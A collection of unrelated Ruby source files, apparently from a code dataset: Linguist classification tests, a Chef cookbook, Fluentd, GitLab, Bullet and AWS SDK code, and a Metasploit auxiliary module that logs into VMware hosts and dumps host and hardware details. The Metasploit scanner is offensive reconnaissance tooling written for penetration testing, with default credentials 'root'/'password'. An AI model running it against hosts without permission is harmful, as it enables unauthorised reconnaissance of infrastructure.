assert blob("MainMenu.xib").generated?
assert blob("MainMenu.nib").generated?
assert blob("project.pbxproj").generated?
# Gemfile.locks
assert blob("Gemfile.lock").generated?
# Generated .NET Docfiles
assert blob("net_docfile.xml").generated?
# Long line
assert !blob("uglify.js").generated?
# Inlined JS, but mostly code
assert !blob("json2_backbone.js").generated?
# Minified JS
assert !blob("jquery-1.6.1.js").generated?
assert blob("jquery-1.6.1.min.js").generated?
assert blob("jquery-1.4.2.min.js").generated?
# CoffeScript JS
# These examples are to basic to tell
assert !blob("coffee/empty.js").generated?
assert !blob("coffee/hello.js").generated?
assert blob("coffee/intro-old.js").generated?
assert blob("coffee/classes-old.js").generated?
assert blob("coffee/intro.js").generated?
assert blob("coffee/classes.js").generated?
end
def test_vendored
assert !blob("README").vendored?
# Node depedencies
assert blob("node_modules/coffee-script/lib/coffee-script.js").vendored?
# Rails vendor/
assert blob("vendor/plugins/will_paginate/lib/will_paginate.rb").vendored?
# C deps
assert blob("deps/http_parser/http_parser.c").vendored?
assert blob("deps/v8/src/v8.h").vendored?
# Prototype
assert !blob("public/javascripts/application.js").vendored?
assert blob("public/javascripts/prototype.js").vendored?
assert blob("public/javascripts/effects.js").vendored?
assert blob("public/javascripts/controls.js").vendored?
assert blob("public/javascripts/dragdrop.js").vendored?
# jQuery
assert blob("jquery.js").vendored?
assert blob("public/javascripts/jquery.js").vendored?
assert blob("public/javascripts/jquery.min.js").vendored?
assert blob("public/javascripts/jquery-1.7.js").vendored?
assert blob("public/javascripts/jquery-1.7.min.js").vendored?
assert blob("public/javascripts/jquery-1.5.2.js").vendored?
assert blob("public/javascripts/jquery-1.6.1.js").vendored?
assert blob("public/javascripts/jquery-1.6.1.min.js").vendored?
assert !blob("public/javascripts/jquery.github.menu.js").vendored?
# MooTools
assert blob("public/javascripts/mootools-core-1.3.2-full-compat.js").vendored?
assert blob("public/javascripts/mootools-core-1.3.2-full-compat-yc.js").vendored?
# Dojo
assert blob("public/javascripts/dojo.js").vendored?
# MochiKit
assert blob("public/javascripts/MochiKit.js").vendored?
# YUI
assert blob("public/javascripts/yahoo-dom-event.js").vendored?
assert blob("public/javascripts/yahoo-min.js").vendored?
assert blob("public/javascripts/yuiloader-dom-event.js").vendored?
# LESS
assert blob("public/javascripts/less-1.1.0.js").vendored?
assert blob("public/javascripts/less-1.1.0.min.js").vendored?
# WYS editors
assert blob("public/javascripts/ckeditor.js").vendored?
assert blob("public/javascripts/tiny_mce.js").vendored?
assert blob("public/javascripts/tiny_mce_popup.js").vendored?
assert blob("public/javascripts/tiny_mce_src.js").vendored?
# Fabric
assert blob("fabfile.py").vendored?
# WAF
assert blob("waf").vendored?
# Visual Studio IntelliSense
assert blob("Scripts/jquery-1.7-vsdoc.js").vendored?
# Microsoft Ajax
assert blob("Scripts/MicrosoftAjax.debug.js").vendored?
assert blob("Scripts/MicrosoftAjax.js").vendored?
assert blob("Scripts/MicrosoftMvcAjax.debug.js").vendored?
assert blob("Scripts/MicrosoftMvcAjax.js").vendored?
assert blob("Scripts/MicrosoftMvcValidation.debug.js").vendored?
assert blob("Scripts/MicrosoftMvcValidation.js").vendored?
# jQuery validation plugin (MS bundles this with asp.net mvc)
assert blob("Scripts/jquery.validate.js").vendored?
# NuGet Packages
assert blob("packages/Modernizr.2.0.6/Content/Scripts/modernizr-2.0.6-development-only.js").vendored?
end
def test_indexable
assert blob("file.txt").indexable?
assert blob("foo.rb").indexable?
assert !blob("defu.nkt").indexable?
assert !blob("dump.sql").indexable?
assert !blob("github.po").indexable?
assert !blob("linguist.gem").indexable?
end
def test_language
assert_equal Language['C'], blob("hello.c").language
assert_equal Language['C'], blob("hello.h").language
assert_equal Language['C++'], blob("bar.h").language
assert_equal Language['C++'], blob("bar.hpp").language
assert_equal Language['C++'], blob("hello.cpp").language
assert_equal Language['C++'], blob("cuda.cu").language
assert_equal Language['GAS'], blob("hello.s").language
assert_equal Language['Logtalk'], blob("foo.lgt").language
assert_equal Language['Objective-C'], blob("Foo.h").language
assert_equal Language['Objective-C'], blob("Foo.m").language
assert_equal Language['Objective-C'], blob("FooAppDelegate.h").language
assert_equal Language['Objective-C'], blob("FooAppDelegate.m").language
assert_equal Language['Objective-C'], blob("hello.m").language
assert_equal Language['OpenCL'], blob("fft.cl").language
assert_equal Language['Ruby'], blob("foo.rb").language
assert_equal Language['Ruby'], blob("script.rb").language
assert_equal Language['Ruby'], blob("wrong_shebang.rb").language
assert_equal Language['Arduino'], blob("hello.ino").language
assert_equal Language['VHDL'], blob("foo.vhd").language
assert_nil blob("octocat.png").language
# .cls disambiguation
# https://github.com/abevoelker/abl-email-client/blob/master/com/abevoelker/email/Email.cls
assert_equal Language['OpenEdge ABL'], blob("Email.cls").language
# https://github.com/emcmanis/Thesis/blob/master/TeX/Thesis%20Template/reedthesis.cls
assert_equal Language['TeX'], blob("reedthesis.cls").language
# https://github.com/DangerMouseB/VLMessaging/blob/master/VLMMachineRouter/cApplication.cls
assert_equal Language['Visual Basic'], blob("cApplication.cls").language
# https://github.com/apex-commons/base/blob/master/src/classes/ArrayUtils.cls
assert_equal Language['Apex'], blob("ArrayUtils.cls").language
# .pl disambiguation
assert_equal Language['Prolog'], blob("test-prolog.pl").language
assert_equal Language['Perl'], blob("test-perl.pl").language
assert_equal Language['Perl'], blob("test-perl2.pl").language
# .m disambiguation
assert_equal Language['Objective-C'], blob("Foo.m").language
assert_equal Language['Objective-C'], blob("hello.m").language
assert_equal Language['Matlab'], blob("matlab_function.m").language
assert_equal Language['Matlab'], blob("matlab_script.m").language
# .r disambiguation
assert_equal Language['R'], blob("hello-r.R").language
assert_equal Language['Rebol'], blob("hello-rebol.r").language
# .t disambiguation
assert_equal Language['Perl'], blob("perl-test.t").language
assert_equal Language['Turing'], blob("turing.t").language
# .v disambiguation
# https://github.com/progranism/Open-Source-FPGA-Bitcoin-Miner/blob/master/src/sha-256-functions.v
assert_equal Language['Verilog'], blob("sha-256-functions.v").language
# https://github.com/coq/coq/blob/trunk/doc/faq/interval_discr.v
assert_equal Language['Coq'], blob("interval_discr.v").language
# ML
assert_equal Language['OCaml'], blob("Foo.ml").language
assert_equal Language['Standard ML'], blob("Foo.sig").language
assert_equal Language['Standard ML'], blob("Foo.sml").language
# Scilab
assert_equal Language['Scilab'], blob("scilab_script.sce").language
assert_equal Language['Scilab'], blob("scilab_function.sci").language
assert_equal Language['Scilab'], blob("scilab_test.tst").language
# Config files
assert_equal Language['INI'], blob(".gitconfig").language
assert_equal Language['Shell'], blob(".bash_profile").language
assert_equal Language['Shell'], blob(".bashrc").language
assert_equal Language['Shell'], blob(".profile").language
assert_equal Language['Shell'], blob(".zlogin").language
assert_equal Language['Shell'], blob(".zshrc").language
assert_equal Language['VimL'], blob(".gvimrc").language
assert_equal Language['VimL'], blob(".vimrc").language
assert_equal Language['YAML'], blob(".gemrc").language
assert_nil blob("blank").language
assert_nil blob("README").language
# https://github.com/xquery/xprocxq/blob/master/src/xquery/xproc.xqm
assert_equal Language['XQuery'], blob("xproc.xqm").language
# https://github.com/wycats/osx-window-sizing/blob/master/center.applescript
assert_equal Language['AppleScript'], blob("center.scpt").language
assert_equal Language['AppleScript'], blob("center.applescript").language
# https://github.com/Araq/Nimrod/tree/master/examples
assert_equal Language['Nimrod'], blob("foo.nim").language
# http://supercollider.sourceforge.net/
# https://github.com/drichert/BCR2000.sc/blob/master/BCR2000.sc
assert_equal Language['SuperCollider'], blob("BCR2000.sc").language
# https://github.com/harrah/xsbt/wiki/Quick-Configuration-Examples
assert_equal Language['Scala'], blob('build.sbt').language
# https://github.com/gradleware/oreilly-gradle-book-examples/blob/master/ant-antbuilder/build.gradle
assert_equal Language['Groovy'], blob("build.gradle").language
# http://docs.racket-lang.org/scribble/
assert_equal Language['Racket'], blob("scribble.scrbl").language
# https://github.com/drupal/drupal/blob/7.x/modules/php/php.module
assert_equal Language['PHP'], blob("drupal.module").language
# https://github.com/googleapi/googleapi/blob/master/demos/gmail_demo/gmail.dpr
assert_equal Language['Delphi'], blob("program.dpr").language
# https://github.com/philiplaureano/Nemerle.FizzBuzz/blob/master/FizzBuzz/FizzBuzzer.n
assert_equal Language['Nemerle'], blob("hello.n").language
# https://github.com/dharmatech/agave/blob/master/demos/asteroids.sps
assert_equal Language['Scheme'], blob("asteroids.sps").language
# https://github.com/graydon/rust
assert_equal Language['Rust'], blob("hello.rs").language
# https://github.com/olabini/ioke
assert_equal Language['Ioke'], blob("hello.ik").language
# https://github.com/parrot/parrot
assert_equal Language['Parrot Internal Representation'], blob("hello.pir").language
assert_equal Language['Parrot Assembly'], blob("hello.pasm").language
# http://gosu-lang.org
assert_equal Language['Gosu'], blob("Hello.gsx").language
assert_equal Language['Gosu'], blob("hello.gsp").language
assert_equal Language['Gosu'], blob("Hello.gst").language
assert_equal Language['Gosu'], blob("hello.vark").language
# Groovy Server Pages
assert_equal Language['Groovy Server Pages'], blob("bar.gsp").language
assert_equal Language['Groovy Server Pages'], blob("hello-resources.gsp").language
assert_equal Language['Groovy Server Pages'], blob("hello-pagedirective.gsp").language
assert_equal Language['Groovy Server Pages'], blob("hello-var.gsp").language
# https://github.com/Lexikos/AutoHotkey_L
assert_equal Language['AutoHotkey'], blob("hello.ahk").language
# Haml
assert_equal Language['Haml'], blob("hello.haml").language
assert_equal Language['HTML'], blob("hello.haml").language.group
# Sass
assert_equal Language['Sass'], blob("screen.sass").language
assert_equal Language['CSS'], blob("screen.sass").language.group
assert_equal Language['SCSS'], blob("screen.scss").language
assert_equal Language['CSS'], blob("screen.scss").language.group
# OpenEdge ABL / Progress
assert_equal Language['OpenEdge ABL'], blob("openedge.p").language
# Tea
assert_equal Language['Tea'], blob("foo.tea").language
# Kotlin
assert_equal Language['Kotlin'], blob("Foo.kt").language
# Julia: http://julialang.org/
assert_equal Language['Julia'], blob("stockcorr.jl").language
# Dart: http://dartlang.org/
assert_equal Language['Dart'], blob("point.dart").language
end
def test_lexer
assert_equal Lexer['Diff'], blob("dude-thing-okay--001.patch").lexer
assert_equal Lexer['JavaScript'], blob("dude.js").lexer
assert_equal Lexer['Ruby'], blob("Capfile").lexer
assert_equal Lexer['Ruby'], blob("grit.rb").lexer
assert_equal Lexer['Scheme'], blob("dude.el").lexer
assert_equal Lexer['Text only'], blob("README").lexer
assert_equal Lexer['Tea'], blob("foo.tea").lexer
assert_equal Lexer['vhdl'], blob("foo.vhd").lexer
assert_equal Lexer['Julia'], blob("stockcorr.jl").lexer
assert_equal Lexer['Dart'], blob("point.dart").lexer
end
def test_shebang_script
assert_equal 'sh', script_blob("script.sh").shebang_script
assert_equal 'bash', script_blob("script.bash").shebang_script
assert_equal 'zsh', script_blob("script.zsh").shebang_script
assert_equal 'perl', script_blob("script.pl").shebang_script
assert_equal 'ruby', script_blob("script.rb").shebang_script
assert_equal 'ruby', script_blob("script2.rb").shebang_script
assert_equal 'python', script_blob("script.py").shebang_script
assert_equal 'node', script_blob("script.js").shebang_script
assert_equal 'groovy', script_blob("script.groovy").shebang_script
assert_equal 'macruby', script_blob("script.mrb").shebang_script
assert_equal 'rake', script_blob("script.rake").shebang_script
assert_equal 'foo', script_blob("script.foo").shebang_script
assert_equal 'nush', script_blob("script.nu").shebang_script
assert_equal 'scala', script_blob("script.scala").shebang_script
assert_equal 'racket', script_blob("script.rkt").shebang_script
assert_equal nil, script_blob("foo.rb").shebang_script
end
def test_shebang_language
assert_equal Language['Shell'], script_blob("script.sh").shebang_language
assert_equal Language['Shell'], script_blob("script.bash").shebang_language
assert_equal Language['Shell'], script_blob("script.zsh").shebang_language
assert_equal Language['Perl'], script_blob("script.pl").shebang_language
assert_equal Language['Ruby'], script_blob("script.rb").shebang_language
assert_equal Language['Python'], script_blob("script.py").shebang_language
assert_equal Language['JavaScript'], script_blob("script.js").shebang_language
assert_equal Language['Groovy'], script_blob("script.groovy").shebang_language
assert_equal Language['Ruby'], script_blob("script.mrb").shebang_language
assert_equal Language['Ruby'], script_blob("script.rake").shebang_language
assert_equal Language['Nu'], script_blob("script.nu").shebang_language
assert_equal Language['Scala'], script_blob("script.scala").shebang_language
assert_equal Language['Racket'], script_blob("script.rkt").shebang_language
assert_equal nil, script_blob("script.foo").shebang_language
assert_equal nil, script_blob("foo.rb").shebang_language
end
def test_colorize
assert_equal <<-HTML, blob("foo.rb").colorize
<div class="highlight"><pre><span class="k">module</span> <span class="nn">Foo</span>
<span class="k">end</span>
</pre>
</div>
HTML
end
def test_colorize_without_wrapper
assert_equal <<-HTML, blob("foo.rb").colorize_without_wrapper
<span class="k">module</span> <span class="nn">Foo</span>
<span class="k">end</span>
HTML
end
def test_colorize_skips_minified_files
assert_nil blob("jquery-1.6.1.min.js").colorize
end
end
| 39.730315 | 105 | 0.705297 |
6174aec12dc4639e53c803fbbae3a2300f7e65c2 | 412 | name 'lempit'
maintainer 'Ross Timson'
maintainer_email '[email protected]'
license 'MIT'
description 'Installs a LEMP stack for local development of PHP projects.'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '0.1.0'
depends 'mysql'
depends 'nginx'
depends 'php'
%w{ ubuntu }.each do |os|
supports os
end
| 25.75 | 80 | 0.63835 |
87b1bc7ff13b6fbb8f18f64684c7ad9bfbadb96d | 2,701 | #
# Fluent
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'set'
require 'fluent/env'
require 'fluent/variable_store'
module Fluent
module PluginId
def initialize
super
@_plugin_id_variable_store = nil
@_plugin_root_dir = nil
@id = nil
end
def configure(conf)
@_plugin_id_variable_store = Fluent::VariableStore.fetch_or_build(:pluing_id, default_value: Set.new)
@id = conf['@id']
@_id_configured = !!@id # plugin id is explicitly configured by users (or not)
if @id
@id = @id.to_s
if @_plugin_id_variable_store.include?(@id) && !plugin_id_for_test?
raise Fluent::ConfigError, "Duplicated plugin id `#{@id}`. Check whole configuration and fix it."
end
@_plugin_id_variable_store.add(@id)
end
super
end
def plugin_id_for_test?
caller_locations.each do |location|
# Thread::Backtrace::Location#path returns base filename or absolute path.
# #absolute_path returns absolute_path always.
# https://bugs.ruby-lang.org/issues/12159
if location.absolute_path =~ /\/test_[^\/]+\.rb$/ # location.path =~ /test_.+\.rb$/
return true
end
end
false
end
def plugin_id_configured?
if instance_variable_defined?("@_id_configured")
@_id_configured
end
end
def plugin_id
if instance_variable_defined?("@id")
@id || "object:#{object_id.to_s(16)}"
else
"object:#{object_id.to_s(16)}"
end
end
def plugin_root_dir
return @_plugin_root_dir if @_plugin_root_dir
return nil unless system_config.root_dir
return nil unless plugin_id_configured?
# Fluent::Plugin::Base#fluentd_worker_id
dir = File.join(system_config.root_dir, "worker#{fluentd_worker_id}", plugin_id)
FileUtils.mkdir_p(dir, mode: system_config.dir_permission || Fluent::DEFAULT_DIR_PERMISSION) unless Dir.exist?(dir)
@_plugin_root_dir = dir.freeze
dir
end
def stop
if @_plugin_id_variable_store
@_plugin_id_variable_store.delete(@id)
end
super
end
end
end
| 28.734043 | 121 | 0.664198 |
7968c9425f2ac498481ae46059b4824913c11962 | 819 | require 'spec_helper'
describe Projects::ServicesController, '(JavaScript fixtures)', type: :controller do
include JavaScriptFixturesHelpers
let(:admin) { create(:admin) }
let(:namespace) { create(:namespace, name: 'frontend-fixtures' )}
let(:project) { create(:project_empty_repo, namespace: namespace, path: 'services-project') }
let!(:service) { create(:prometheus_service, project: project) }
render_views
before(:all) do
clean_frontend_fixtures('services/prometheus')
end
before do
sign_in(admin)
end
it 'services/prometheus/prometheus_service.html.raw' do |example|
get :edit,
namespace_id: namespace,
project_id: project,
id: service.to_param
expect(response).to be_success
store_frontend_fixture(response, example.description)
end
end
| 26.419355 | 97 | 0.71917 |
ab1ed9c24c8232468ec67a4d36a41424b1cae680 | 328 | cask 'font-tauri' do
version :latest
sha256 :no_check
# github.com/google/fonts was verified as official when first introduced to the cask
url 'https://github.com/google/fonts/raw/master/ofl/tauri/Tauri-Regular.ttf'
name 'Tauri'
homepage 'http://www.google.com/fonts/specimen/Tauri'
font 'Tauri-Regular.ttf'
end
| 27.333333 | 86 | 0.743902 |
9136bd08e2c03236a8a7d08cd0af33e03918b133 | 330 | class CreateTodoItems < ActiveRecord::Migration[4.2]
def self.up
create_table :todo_items do |t|
t.string :description
t.string :action
t.string :url
t.string :image_url
t.integer :plaque_id
t.integer :user_id
t.timestamps
end
end
def self.down
drop_table :todo_items
end
end | 19.411765 | 53 | 0.666667 |
bb4d8cb074f9baccba8230bd3ad644673e2a6672 | 6,284 | module Expando::ApiAi::Objects
# Initialized with a hash representing an existing API.ai intent, and the path
# to an Expando file for that intent, generates the JSON for a new version of
# the intent.
#
# @see https://docs.api.ai/docs/intents#intent-object
class Intent < Base
# The list of attributes that can be removed from the intent JSON before updating.
ATTRIBUTES_TO_REMOVE = %w{auto state priority webhookUsed lastUpdate fallbackIntent cortanaCommand}
# !@attribute responses_file
# @return [Expando::SourceFiles::ResponsesFile]
# The Expando source file for this intent's responses.
option :responses_file, default: proc { nil }
# !@attribute entity_files
# @return [Array<Expando::SourceFiles::EntitiesFile>]
# The Expando entity source files.
option :entity_files, default: proc { [] }
# Properly perform all Expando transformations (expansion, annotation) to the
# source for the intent, generate a new version of the intent's JSON, and update
# it on API.ai.
#
# @return [void]
def update!
# Fetch the latest version of the intent from API.ai.
intent_json = current_version
# Replace the original utterances with the Expando-processed utterances, and
# their new associated params.
intent_json[:templates] = processed_utterances
new_user_says, new_params = user_says_value(intent_json[:responses][0][:parameters])
intent_json[:userSays] = new_user_says
intent_json[:responses][0][:parameters] = new_params
# Replace the responses, if a response file exists for this intent.
intent_json[:responses][0][:messages][0][:speech] = responses if @responses_file
# Clean up portions of the JSON response that we don't need in the request
ATTRIBUTES_TO_REMOVE.each { |key| intent_json.delete(key.to_sym) }
response = @api_client.update_intent_request(intent_json)
handle_response(response, :intent)
end
private
# Generate new user utterances based on the Expando source for this intent.
#
# @return [Array<Hash>] The new `userSays` attribute.
def processed_utterances
@processed_utterances ||= Expando::Expander.expand! @source_file.lines
end
# TODO: High- document, test, and decompose
def user_says_value(existing_params)
additional_params = Set.new(existing_params)
new_user_says = processed_utterances.collect do |utterance|
# If an entity is referenced on this line...
if utterance.match(Expando::Tokens::ENTITY_REF_MATCHER)
template = utterance.dup
data = []
# For every matching entity reference...
utterance.scan(Expando::Tokens::ENTITY_REF_MATCHER).each do |entity_reference|
entity_name, is_system_entity, last_letter, parameter_name = entity_reference
param_data_type = "@#{entity_name}"
param_value = "$#{parameter_name}"
# Unless the param is already in the list...
unless additional_params.select { |p| p[:name] == parameter_name }.first
# ...add the new param to the list of params.
additional_params << {
dataType: param_data_type,
name: parameter_name,
value: param_value,
isList: false
}
end
# Find a random value to use for the entity.
example_entity_value = example_entity_value(entity_name, is_system_entity)
# Add data entries.
data << { text: template.match(Expando::Tokens::UNTIL_ENTITY_REF_MATCHER)[0] }
data << {
text: example_entity_value,
alias: parameter_name,
meta: "@#{entity_name}"
}
# Remove the processed portions from the template string
template.sub!(Expando::Tokens::UNTIL_ENTITY_REF_MATCHER, '')
template.sub!(Expando::Tokens::ENTITY_REF_MATCHER, '')
end
# Add everything that remains.
data << {
text: template
}
{
data: data,
isTemplate: false
}
else
{
data: [
text: utterance
],
# TODO: Make this an option
isTemplate: false
}
end
end
[new_user_says, additional_params.to_a]
end
# Find a random value for the given entity.
#
# @param entity_name [String] The name of the entity.
# @param is_system_entity [Boolean] true if this is an API.ai system entity.
#
# @return [String] The random entity value.
def example_entity_value(entity_name, is_system_entity)
# If this is a system entity...
if is_system_entity
# ...grab a random canonical value for the entity.
Expando::ApiAi::SystemEntityExamples::VALUES[entity_name].sample
# If this is a developer entity...
else
# ...find a matching entity file.
# TODO: High - throw an error if none.
entity_file =
@entity_files
.select { |entity_file| entity_file.entity_name == entity_name }
.first
# Grab a random canonical value for the entity.
entity_file.random_canonical_value
end
end
# Generate new responses for this intent based on the Expando responses source.
#
# @return [Array<String>] The new responses.
def responses
return false unless @responses_file
Expando::Expander.expand! @responses_file.lines
end
# Fetch the existing intent with this name on API.ai.
#
# @return [Hash] The current version of the intent object on API.ai.
def current_version
@@intents ||= @api_client.get_intents_request
matching_intent = @@intents.select { |intent| intent[:name] == @source_file.intent_name }
# TODO: needs an exception class
raise "There is no intent named #{@source_file.intent_name}" if matching_intent.empty?
intent_id = matching_intent.first[:id]
Expando::Logger.log "Fetching latest version of #{@source_file.intent_name} intent"
@api_client.get_intent_request(intent_id)
end
end
end
| 35.303371 | 103 | 0.64147 |
8734bc521574c6b41cbc98c866ef369f9c3b671b | 1,758 | module Bullet
module Mongoid
def self.enable
require 'mongoid'
::Mongoid::Contextual::Mongo.class_eval do
alias_method :origin_first, :first
alias_method :origin_last, :last
alias_method :origin_each, :each
alias_method :origin_eager_load, :eager_load
def first
result = origin_first
Bullet::Detector::NPlusOneQuery.add_impossible_object(result) if result
result
end
def last
result = origin_last
Bullet::Detector::NPlusOneQuery.add_impossible_object(result) if result
result
end
def each(&block)
records = query.map{ |doc| ::Mongoid::Factory.from_db(klass, doc) }
if records.length > 1
Bullet::Detector::NPlusOneQuery.add_possible_objects(records)
elsif records.size == 1
Bullet::Detector::NPlusOneQuery.add_impossible_object(records.first)
end
origin_each(&block)
end
def eager_load(docs)
associations = criteria.inclusions.map(&:name)
docs.each do |doc|
Bullet::Detector::NPlusOneQuery.add_object_associations(doc, associations)
end
Bullet::Detector::UnusedEagerLoading.add_eager_loadings(docs, associations)
origin_eager_load(docs)
end
end
::Mongoid::Relations::Accessors.class_eval do
alias_method :origin_set_relation, :set_relation
def set_relation(name, relation)
if relation && relation.relation_metadata.macro !~ /embed/
Bullet::Detector::NPlusOneQuery.call_association(self, name)
end
origin_set_relation(name, relation)
end
end
end
end
end
| 31.392857 | 86 | 0.630262 |
213d404049ba10bbc45e2976c24fa45d82d605d1 | 2,759 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2019_01_01
module Models
#
# Paged email template list representation.
#
class EmailTemplateCollection
include MsRestAzure
include MsRest::JSONable
# @return [Array<EmailTemplateContract>] Page values.
attr_accessor :value
# @return [String] Next page link if any.
attr_accessor :next_link
# return [Proc] with next page method call.
attr_accessor :next_method
#
# Gets the rest of the items for the request, enabling auto-pagination.
#
# @return [Array<EmailTemplateContract>] operation results.
#
def get_all_items
items = @value
page = self
while page.next_link != nil && !page.next_link.strip.empty? do
page = page.get_next_page
items.concat(page.value)
end
items
end
#
# Gets the next page of results.
#
# @return [EmailTemplateCollection] with next page content.
#
def get_next_page
response = @next_method.call(@next_link).value! unless @next_method.nil?
unless response.nil?
@next_link = response.body.next_link
@value = response.body.value
self
end
end
#
# Mapper for EmailTemplateCollection class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'EmailTemplateCollection',
type: {
name: 'Composite',
class_name: 'EmailTemplateCollection',
model_properties: {
value: {
client_side_validation: true,
required: false,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'EmailTemplateContractElementType',
type: {
name: 'Composite',
class_name: 'EmailTemplateContract'
}
}
}
},
next_link: {
client_side_validation: true,
required: false,
serialized_name: 'nextLink',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 28.153061 | 80 | 0.529177 |
18f2dde1e8ed9b9061dd9ee6ef64f53387858181 | 957 | module Xiki::Menu
class Ruby
def self.classes clazz=nil, method=nil
# /classes/, so show list of classes...
if clazz.nil?
result = []
ObjectSpace.each_object(Class) do |c|
name = c.to_s
next if name =~ /^#/
result << "- #{name}/\n"
end
return result.sort.join
end
# /classes/Class, so show methods...
if method.nil?
result = ""
result << Kernel.const_get(clazz).instance_methods(false).sort.
collect {|i| "- #{i}/" }.join("\n")
result << Kernel.const_get(clazz).methods(false).sort.
collect {|i| "- ::#{i}/" }.join("\n")
return result
end
# /classes/Class/method, so lookup method's doc
method = "##{method}" unless method =~ /^::/
command = "ri --format=rdoc #{clazz}#{method}"
Console[command].gsub(/\C-[.+?m/, '').gsub(/^/, '| ').gsub(/^\| +$/, '|')
end
end
end
| 26.583333 | 79 | 0.508882 |
621bdd673dd1fa89436dafd6989b1553853d9d86 | 1,892 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::VIMSoap
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'VMWare Enumerate Host Details',
'Version' => '$Revision$',
'Description' => %Q{
This module attempts to enumerate information about the host systems through the VMWare web API.
This can include information about the hardware installed on the host machine.
},
'Author' => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]),
OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]),
OptBool.new('HW_DETAILS', [true, "Enumerate the Hardware on the system as well?", false])
], self.class)
register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),])
end
def run_host(ip)
if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success
output = "VMWare Host at #{ip} details\n"
output << "-----------------------------\n"
host_summary = vim_get_all_host_summary(datastore['HW_DETAILS'])
output << YAML.dump(host_summary)
print_good output
store_loot('vmware_host_details', "text/plain", datastore['RHOST'], output, "#{datastore['RHOST']}_vmware_host.txt", "VMWare Host Details")
else
print_error "Login Failure on #{ip}"
return
end
end
end
| 30.516129 | 142 | 0.678118 |
bfc02c96484c918453fc5cb63e611d1262442d15 | 830 | class ::Hash
# Inspired by: http://stackoverflow.com/a/9381776
def deep_merge(second)
merger = proc { |_key, v1, v2|
v1.is_a?(Hash) && v2.is_a?(Hash) ? v1.merge(v2, &merger) : v2
}
merge(second, &merger)
end
# converts a deep hash into a flat hash
# hash = {
# 'a' => 1,
# 'b' => {'c' => 2},
# }
# hash.smash # => {"a"=>1, "b-c"=>2}
def smash(prefix = nil)
inject({}) do |acc, (key, value)|
index = prefix.to_s + key.to_s
if value.is_a?(Hash)
acc.merge(value.smash(index + '-'))
else
acc.merge(index => value)
end
end
end
# deep check if all values are contained
def contains(contains)
hash = smash
contains = contains.smash
contains.each do |key, val|
return false if hash[key] != val
end
true
end
end
| 21.842105 | 67 | 0.551807 |
08c1580b1fed16ed60f7d0cf21774ee7275ce3c7 | 12,724 | # Copyright 2011 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
require 'aws/core'
require 'aws/ec2/config'
module AWS
# Provides an expressive, object-oriented interface to Amazon EC2.
#
# == Credentials
#
# You can setup default credentials for all AWS services via
# AWS.config:
#
# AWS.config(
# :access_key_id => 'YOUR_ACCESS_KEY_ID',
# :secret_access_key => 'YOUR_SECRET_ACCESS_KEY')
#
# Or you can set them directly on the EC2 interface:
#
# ec2 = AWS::EC2.new(
# :access_key_id => 'YOUR_ACCESS_KEY_ID',
# :secret_access_key => 'YOUR_SECRET_ACCESS_KEY')
#
# == Instances
#
# EC2 uses instances to run your software.
#
# To run an instance:
#
# ec2.instances.create(:image_id => "ami-8c1fece5")
#
# To get an instance by ID:
#
# i = ec2.instances["i-12345678"]
# i.exists?
#
# To get a list of instances:
#
# ec2.instances.inject({}) { |m, i| m[i.id] = i.status; m }
# # => { "i-12345678" => :running, "i-87654321" => :shutting_down }
#
# == Security Groups
#
# A security group is a named collection of access rules. These access
# rules specify which ingress (i.e., incoming) network traffic should be
# delivered to your instance. All other ingress traffic will be discarded.
#
# To create a security group:
#
# websvr = ec2.security_groups.create('webservers')
#
# Then you can add ingress authorizations. In the following example
# we add a rule that allows web traffic from the entire internet.
#
# # web traffic
# websvr.authorize_ingress(:tcp, 80)
#
# You can also specify a port range. Here we are opening FTP traffic:
#
# # ftp traffic
# websvr.authorize_ingress(:tcp, 20..21)
#
# If you want to limit an authorization to a particular CIDR IP address or
# list of address, just add them to the #authorize_ingress call.
#
# # ssh access
# websrvr.authorize_ingress(:tcp, 22, '1.1.1.1/0', '2.2.2.2/0')
#
# You can also provide another security group instead of CIDR IP addresses.
# This allows incoming traffic from EC2 instances in the given security
# group(s).
#
# # get two existing security groups
# dbsvrs = ec2.security_groups['db-servers']
# websvrs = ec2.security_groups['web-servers']
#
# # allow instances in the 'web-servers' security group to connect
# # to instances in the 'db-servers' security group over tcp port 3306
# dbsvrs.authorize_ingress(:tcp, 3306, websvrs)
#
# There are a few handy shortcuts for allowing pings:
#
# wbsvrs.allow_ping
#
# Just like with authorize_ingress you can pass a security group or a list
# of CIDR IP addresses to allow ping to limit where you can ping from.
#
# You can also use the same parameters from the examples above to
# {SecurityGroup#revoke_ingress} and {SecurityGroup#disallow_ping}.
#
